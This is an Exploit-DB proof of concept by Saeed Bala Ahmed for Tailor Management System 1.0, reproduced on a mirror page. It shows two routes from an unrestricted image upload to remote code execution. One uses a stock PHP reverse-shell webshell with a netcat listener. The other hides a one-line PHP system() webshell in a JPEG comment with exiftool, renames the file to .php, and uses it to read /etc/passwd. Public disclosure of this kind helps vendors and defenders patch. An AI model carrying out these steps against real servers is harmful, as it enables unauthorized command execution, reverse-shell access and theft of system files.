Tailor Management System 1.0 – Unrestricted File Upload to Remote Code Execution

  • 作者: Saeed Bala Ahmed
    日期: 2020-12-01
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/49136/
  • # Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
    # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
    # Date: 2020-09-18
    # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
    # Affected Version: Version 1
    # Category: Web Application
    # Tested on: Parrot OS
    Step 1: Log in to the CMS with any valid user credentials.
    Step 2: Select Measurement Settings and click on "Set Measurement Parts".
    Step 3: Create any php payload on locally on your system. ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php)
    Step 4: Fill the required details and upload the php payload you created using the image upload field.
    Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts".
    Step 6: Start netcat listener.
    Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload.
    ========================== OR ==========================
    Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg"
    Step 2: Rename the malicious image to have include a ".php" extention. Example ( mv r0b0t.jpg r0b0t.jpg.php )
    Step 3: Log in to the CMS with any valid user credentials.
    Step 4: Select Measurement Settings and click on "Set Measurement Parts".
    Step 5: Fill the required details and upload malicious image you created using the image upload field.
    Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts".
    Step 7: Use the search filter to find your measurement and click on "edit" to edit details.
    Step 8: Righ click on the broken image and copy image location.
    Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )